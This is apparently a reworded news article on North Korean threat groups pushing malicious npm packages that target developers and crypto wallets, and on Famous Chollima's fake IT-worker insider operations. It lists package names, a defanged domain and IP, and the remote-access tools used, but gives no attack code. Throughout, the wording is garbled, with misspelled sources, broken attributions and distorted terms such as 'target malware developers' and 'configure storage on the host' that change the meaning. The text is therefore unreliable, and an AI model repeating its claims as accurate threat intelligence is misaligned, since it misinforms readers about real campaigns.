Threat actors linked to North Korea have been seen publishing a number of malicious packages to the npm registry, indicating a “coordinated and relentless” effort to target malware developers and steal cryptocurrency assets.
The latest wave, observed between August 12 and 27, 2024, included packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.
“The behavior of this company leads us to believe that qq-console is related to a North Korean company known as Contagious Interview,” wrote software security firm Phylum. said.
Contagious interview refers to an campaign continues which seeks to compromise software developers with information-stealing malware as part of a supposed interview process that involves tricking them into downloading fake npm packages or fake installers for video conferencing software like MiroTalk hosted on fraudulent websites.
The ultimate goal of the attacks is to deploy a Python payload called InvisibleFerret that can extract sensitive data from cryptocurrency wallet browser extensions and configure storage on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike tracks activity under the alias Famous Chollima.
The recently spotted helmet-validate package uses a new approach that embeds a piece of JavaScript code file called config.js that directly executes JavaScript hosted on a remote domain (“ipcheck(.)cloud”) using eval() function..
“Our investigation revealed that ipcheck(.)cloud resolves to the same IP address (167(.)88(.)36(.)13) that mirotalk(.)net resolves to when online,” Philum said , emphasizing potential links between two sets of attacks.
The company said it also noticed another package called sass-notification, which was uploaded on August 27, 2024, and which bore similarities to previously open source npm libraries such as call-blockflow. These packages were attributed to another North Korean threat group called Moonstone.
“These attacks are characterized by the use of JavaScript obfuscation to write and execute batch and PowerShell scripts,” it said. “The scripts download and decrypt the deleted payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.”
The famous Cholima presents himself as an IT worker in US firms
The disclosure is via the CrowdStrike link The famous Chollima (formerly BadClone) to insider threat operations which entail penetration into the corporate environment under the pretext of legal employment.
“A known Chollima conducted these operations while obtaining a contract or equivalent full-time employment, using forged or stolen identification documents to bypass background checks,” the company said in a statement. said. “When applying for jobs, these malicious insiders submitted resumes that typically listed previous employment at a well-known company, as well as additional, lesser-known companies with no gaps in employment.”
While these attacks are mostly financially motivated, some incidents are said to involve the theft of sensitive information. CrowdStrike said it identified threat actors targeting or actively working for more than 100 unique companies over the past year, most of which are located in the United States, Saudi Arabia, France, the Philippines and Ukraine.
Top target sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceuticals, social media and media companies.
“After gaining employee-level access to the victim’s networks, the insiders performed minimal tasks related to their job roles,” the company further stated. In some cases, insiders also attempted to steal data using Git, SharePoint, and OneDrive.”
“Additionally, insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then used these RMM tools in tandem with the company’s network credentials, allowing multiple IP addresses to connect to the victim’s system.”
